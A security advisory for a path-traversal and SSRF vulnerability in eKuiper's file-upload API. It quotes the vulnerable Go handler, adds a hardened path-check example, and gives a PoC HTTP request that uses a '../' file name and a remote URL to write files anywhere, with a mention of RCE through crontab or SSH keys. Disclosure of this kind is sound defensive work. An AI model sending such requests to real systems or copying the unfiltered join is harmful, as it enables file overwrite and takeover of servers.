PT-2025-29376 · Go · Github.Com/Lf-Edge/Ekuiper+1

Published

2025-07-03

·

Updated

2025-07-03

CVSS v4.0

7.3

High

Vector AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

Summary

The eKuiper /config/uploads API supports fetching a remote web URL and saving the file in the local upload directory, but it applies no security restrictions, so a file name containing ../ sequences results in an arbitrary file write. If eKuiper runs with root privileges, RCE can be achieved by writing crontab files or SSH keys.

Details

func fileUploadHandler(w http.ResponseWriter, r *http.Request) {
	switch r.Method {
	// Upload or overwrite a file
	case http.MethodPost:
		switch r.Header.Get("Content-Type") {
		case "application/json":
			fc := &fileContent{}
			defer r.Body.Close()
			err := json.NewDecoder(r.Body).Decode(fc)
			if err != nil {
				handleError(w, err, "Invalid body: Error decoding file json", logger)
				return
			}
			err = fc.Validate()
			if err != nil {
				handleError(w, err, "Invalid body: missing necessary field", logger)
				return
			}

			// fc.Name is joined onto uploadDir as-is; nothing rejects ../ components
			filePath := filepath.Join(uploadDir, fc.Name)
			err = upload(fc)
			// ... remainder of the handler elided in the advisory
		}
	}
}
  • The fc.Name parameter is not safely filtered: filepath.Join(uploadDir, fc.Name) normalizes ../ components instead of rejecting them, so the resulting path can point anywhere on the filesystem.
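The following is an added example, not code from the advisory or the eKuiper project. It contrasts the bare filepath.Join pattern from the handler above with a hypothetical hardened helper (safeUploadPath, an assumed name) that accepts only a plain file name and verifies the result stays inside the upload directory; uploadDir values are constructed for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrInvalidName is returned when a requested name would escape the upload directory.
var ErrInvalidName = errors.New("invalid upload file name")

// naiveUploadPath mirrors the vulnerable pattern: filepath.Join cleans the
// path, so "../" components walk out of uploadDir instead of being rejected.
func naiveUploadPath(uploadDir, name string) string {
	return filepath.Join(uploadDir, name)
}

// safeUploadPath is a hypothetical hardened replacement. The upload API names
// a file, not a path, so any separator is rejected up front; the containment
// check then proves the joined path is still below uploadDir.
func safeUploadPath(uploadDir, name string) (string, error) {
	if name == "" || name == "." || name == ".." {
		return "", ErrInvalidName
	}
	// Reject both separators so "..\\" cannot slip through on Windows hosts.
	if strings.ContainsAny(name, `/\`) {
		return "", ErrInvalidName
	}
	base := filepath.Clean(uploadDir)
	full := filepath.Join(base, name)
	rel, err := filepath.Rel(base, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrInvalidName
	}
	return full, nil
}

func main() {
	// Constructed upload directory and the traversal name from the advisory's PoC.
	dir := "/var/ekuiper/uploads"
	name := "../../../../tmp/success"
	fmt.Println("naive:", naiveUploadPath(dir, name)) // escapes to /tmp/success
	if _, err := safeUploadPath(dir, name); err != nil {
		fmt.Println("safe:", err) // rejected
	}
}
```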

PoC

POST /config/uploads HTTP/1.1
Host: localhost:9081
Content-Type: application/json
Content-Length: 89

{
 "name": "../../../../tmp/success",
 "file": "http://192.168.65.254:8888/success"
}

Impact

Tested and verified only on 1.14.3 and 1.14.1; theoretically all versions using this code could be affected.
  1. SSRF
  2. Path traversal
  3. May lead to RCE
The reporter is m0d9 from Tencent YunDing Lab.

Fix

Weakness Enumeration

Unrestricted File Upload

Related Identifiers

GHSA-GJ54-GWJ9-X2C6

Affected Products

Github.Com/Lf-Edge/Ekuiper
Github.Com/Lf-Edge/Ekuiper/V2